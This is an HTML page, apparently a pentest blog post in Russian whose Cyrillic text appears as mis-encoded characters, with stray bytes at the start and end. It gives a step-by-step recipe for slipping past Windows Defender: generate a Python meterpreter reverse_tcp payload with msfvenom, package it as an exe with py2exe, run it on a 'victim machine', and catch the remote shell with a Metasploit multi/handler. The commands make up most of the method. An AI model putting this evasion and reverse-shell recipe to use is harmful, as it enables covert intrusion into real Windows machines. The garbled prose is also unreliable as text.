I"Œ<h1 class="no_toc" id="–æ–≥–ª–∞–≤–ª–µ–Ω–∏–µ">–û–≥–ª–∞–≤–ª–µ–Ω–∏–µ</h1>

<ul id="markdown-toc">
  <li><a href="#–≤–≤–µ–¥–µ–Ω–∏–µ" id="markdown-toc-–≤–≤–µ–¥–µ–Ω–∏–µ">–í–≤–µ–¥–µ–Ω–∏–µ</a>    <ul>
      <li><a href="#python" id="markdown-toc-python">Python</a></li>
    </ul>
  </li>
  <li><a href="#–Ω–∞—á–∏–Ω–∞–µ–º" id="markdown-toc-–Ω–∞—á–∏–Ω–∞–µ–º">–ù–∞—á–∏–Ω–∞–µ–º</a></li>
  <li><a href="#end" id="markdown-toc-end">–ó–∞–∫–ª—é—á–µ–Ω–∏–µ</a></li>
</ul>

<h1 id="–≤–≤–µ–¥–µ–Ω–∏–µ">–í–≤–µ–¥–µ–Ω–∏–µ</h1>

<p>–ò—Ç–∞–∫ —Å–∏—Ç—É–∞—Ü–∏—è, –µ—Å—Ç—å –≤–æ–∑–º–æ–∂–Ω–æ—Å—Ç—å –∑–∞–≥—Ä—É–∑–∏—Ç—å –Ω–∞ —Ç–µ—Å—Ç–∏—Ä—É–µ–º—É—é –≤ —Ä–∞–º–∫–∞—Ö –ø–µ–Ω—Ç–µ—Å—Ç–∞ –∏–ª–∏ –¥—Ä—É–≥–æ–π –ª–µ–≥–∏–º–∏—Ç–∏–≤–Ω–æ–π –¥–µ—è—Ç–µ–ª—å–Ω–æ—Å—Ç–∏ Windows –º–∞—à–∏–Ω—É —Ñ–∞–π–ª –∏ –¥–∞–∂–µ –≤–æ–∑–º–æ–∂–Ω–æ –∏—Å–ø–æ–ª–Ω–∏—Ç—å –µ–≥–æ. –ï—Å–ª–∏ –º—ã –≥–æ–≤–æ—Ä–∏–º –æ–± –ø–æ—Å–ª–µ–¥–Ω–µ–π, –¥–µ—Å—è—Ç–æ–π –≤–µ—Ä—Å–∏–∏–∏ –û–° —Ç–æ –º—ã —Å—Ç–æ–ª–∫–Ω—ë–º—Å—è —Å –º–µ—Å—Ç–Ω—ã–º–º –µ–≥–æ –∑–∞—â–∏—Ç–Ω–∏–∫–æ–º Windows Defender, —Ç–∞–∫ –∂–µ –≤–µ–ª–∏–∫–∞ –≤–µ—Ä–æ—è—Ç–Ω–æ—Å—Ç—å –Ω–∞—Ç–∫–Ω—É—Ç—å—Å—è –Ω–∞ –∞–Ω—Ç–∏–≤–∏—Ä—É—Å. –í —Ç–∞–∫–æ–π —Å–∏—Ç—É–∞—Ü–∏–∏ –æ—á–µ–Ω—å —É–¥–æ–±–Ω—ã–π –∏ —Ä–∞—Å—à–∏—Ä—è–µ–º—ã–π meterpreter –Ω–µ —Å–º–æ–∂–µ—Ç —Ä–∞–±–æ—Ç–∞—Ç—å, –∫–∞–∫–∞—è –µ—Å—Ç—å –∞–ª—å—Ç–µ—Ä–Ω–∞—Ç–∏–≤–∞?</p>

<h2 id="python">Python</h2>

<p>–í–æ—Ç –∏ –æ—Ç–≤–µ—Ç, –∏—Å–ø–æ–ª—å–∑–æ–≤–∞–Ω–∏–µ Python –≤ —Å–≤—è–∑–∫–µ —Å metasploit –∏ msfvenom –ø–æ–∑–≤–æ–ª—è–µ—Ç –Ω–∞–º –ø–æ–ª—É—á–∏—Ç—å –¥–æ—Å—Ç–æ–π–Ω—É—é –∞–ª—å—Ç–µ—Ä–Ω–∞—Ç–∏–≤—É –∫–ª–∞—Å—Å–∏—á–µ—Å–∫–æ–º—É meterpreter —Å –±–æ–ª—å—à–∏–Ω—Å—Ç–≤–æ–º –µ–≥–æ —É–¥–æ–±–Ω—ã—Ö —Ñ—É–Ω–∫—Ü–∏–π. –ü—Ä–∞–≤–¥–∞ –Ω–µ–∫–æ—Ç–æ—Ä—ã–º–∏ –ø—Ä–∏–¥–µ—Ç—Å—è –ø–æ–∂–µ—Ä—Ç–≤–æ–≤–∞—Ç—å, –Ω–µ –±—É–¥–µ—Ç –≤–æ–∑–º–æ–∂–Ω–æ—Å—Ç–∏ –∏—Å–ø–æ–ª—å–∑–æ–≤–∞—Ç—å —Ç–∞–∫–∏–µ –∫–æ–º–∞–Ω–¥—ã –∫–∞–∫ getsystem –∏ –Ω–µ–ª—å–∑—è –±—É–¥–µ—Ç –º–∏–≥—Ä–∏—Ä–æ–≤–∞—Ç—å –≤ –ø—Ä–æ—Ü–µ—Å—Å.</p>

<h1 id="–Ω–∞—á–∏–Ω–∞–µ–º">–ù–∞—á–∏–Ω–∞–µ–º</h1>

<p>–û–±—â–∞—è —Å—Ö–µ–º–∞ —Ç–∞–∫–æ–≤–∞: –º—ã –≥–µ–Ω–µ—Ä–∏—Ä—É–µ–º python –∫–æ–¥ —Å –ø–æ–º–æ—â—å—é msfvenom, ‚Äú—Å–∫–∞—Ä–º–ª–∏–≤–∞–µ–º‚Äù –µ–≥–æ py2exe, –ø–æ–ª—É—á–µ–Ω—ã–π –±–∏–Ω–∞—Ä–Ω–∏–∫ –∑–∞–ø—É—Å–∫–∞–µ–º –Ω–∞ –º–∞—à–∏–Ω–µ –∂–µ—Ä—Ç–≤—ã –∏ –ª–æ–≤–∏–º —Å–µ—Å—Å–∏—é.
<br /><br />
–î–ª—è –Ω–∞—á–∞–ª–∞ —É—Å—Ç–∞–Ω–æ–≤–∏–º py2exe –ø–æ–¥ 3.4 –≤–µ—Ä—Å–∏—é —Ç–∞–∫ –∫–∞–∫ –≤—Å—ë —á—Ç–æ –≤—ã—à–µ –Ω–µ –ø–æ–¥–¥–µ—Ä–∂–∏–≤–∞–µ—Ç—Å—è.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pip install py2exe
</code></pre></div></div>
<p>–ò–ª–∏, –µ—Å–ª–∏ –≤—ã –∫–∞–∫ –∏ —è –ª—é–±–∏—Ç–µ –æ–±–Ω–æ–≤–ª—è—Ç—å—Å—è</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>python -3.4 ‚Äìm pip install py2exe
</code></pre></div></div>

<p><br /><br /></p>

<p>–î–∞–ª–µ–µ —Å–æ–∑–¥–∞—ë–º .py –∫–æ–¥:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>msfvenom -p python/meterpreter/reverse_tcp LHOST=&lt;IP&gt; LPORT=&lt;PORT&gt; -f raw &gt; payload.py
</code></pre></div></div>

<p>–ö –∫–æ–¥—É –Ω–µ–æ–±—Ö–æ–¥–∏–º–æ –¥–æ–±–∞–≤–∏—Ç—å import getpass –∫–æ—Ç–æ—Ä—ã–π msfvenom –ø–æ —É–º–æ–ª—á–∞–Ω–∏—é –ø–æ—á–µ–º—É-—Ç–æ –Ω–µ –¥–µ–ª–∞–µ—Ç.</p>

<p><br /><br /></p>

<p>–î–µ–ª–∞–µ–º exe:
<br /></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>python34 -m py2exe.build_exe payload.py --bundle-files 0
</code></pre></div></div>

<p>–ò –∑–∞–ø—É—Å–∫–∞–µ–º –µ–≥–æ –Ω–∞ –º–∞—à–∏–Ω–µ –∂–µ—Ä—Ç–≤—ã –ø—Ä–µ–¥–≤–∞—Ä–∏—Ç–µ–ª—å–Ω–æ –∑–∞–ø—É—Å—Ç–∏–≤ handler:<br /></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>msfconsole
use exploit/multi/handler
set PAYLOAD python/meterpreter/reverse_tcp
set lhost eth0
set lport &lt;PORT&gt;
run
</code></pre></div></div>

<p>–ò –ø–æ–ª—É—á–∞–µ–º –∫–æ–º–º–∞–Ω–¥–Ω—É—é –æ–±–æ–ª–æ—á–∫—É:</p>

<p><img src="/assets/img/posts_rus/python_shell.jpg" alt="Python_shell" class="img" /></p>

<h1 id="end">–ó–∞–∫–ª—é—á–µ–Ω–∏–µ</h1>

<p>–ü—Ä–æ—Å—Ç–æ–π –∏ —ç—Ñ—Ñ–µ–∫—Ç–∏–≤–Ω—ã–π —Å–ø–æ—Å–æ–± –±–æ—Ä—å–±—ã —Å Windows Defender –µ—Å–ª–∏ –Ω–µ —Ö–æ—á–µ—Ç—Å—è —Ç–µ—Ä—è—Ç—å —É–¥–æ–±–Ω—ã–π –∏ –ø—Ä–∏–≤—ã—á–Ω—ã–π —Ñ—É–Ω–∫—Ü–∏–æ–Ω–∞–ª meterpreter –≤ —É–≥–æ–¥—É –±–æ–ª–µ–µ –Ω–∞—Ç–∏–≤–Ω—ã–º —Ä–µ—à–µ–Ω–∏—è–º, –∫–∞–∫ –Ω–∞–ø—Ä–∏–º–µ—Ä ssh –∏–ª–∏ telnet. 
<br /><br /></p>
:ET